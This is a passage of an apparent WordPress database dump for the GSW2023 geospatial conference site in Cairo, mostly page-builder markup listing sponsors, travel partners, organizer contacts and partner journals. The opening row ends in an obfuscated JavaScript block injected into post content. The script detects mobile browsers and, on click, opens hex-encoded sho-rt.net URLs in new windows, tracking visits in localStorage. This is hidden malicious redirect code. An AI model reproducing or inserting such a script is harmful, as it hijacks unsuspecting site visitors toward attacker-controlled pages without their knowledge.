_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:58:57','2023-08-16 02:58:57','',3066,'https://gsw2023.com/?p=5278',0,'revision','',0),
(5279,1,'2023-08-16 02:59:43','2023-08-16 02:59:43','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154570478{margin-top: 75px !important;}\"]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>Prime Minister of the </strong></span><span style=\"font-size: 18pt;\"><strong>Arab Republic of Egypt</strong></span></h6>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text 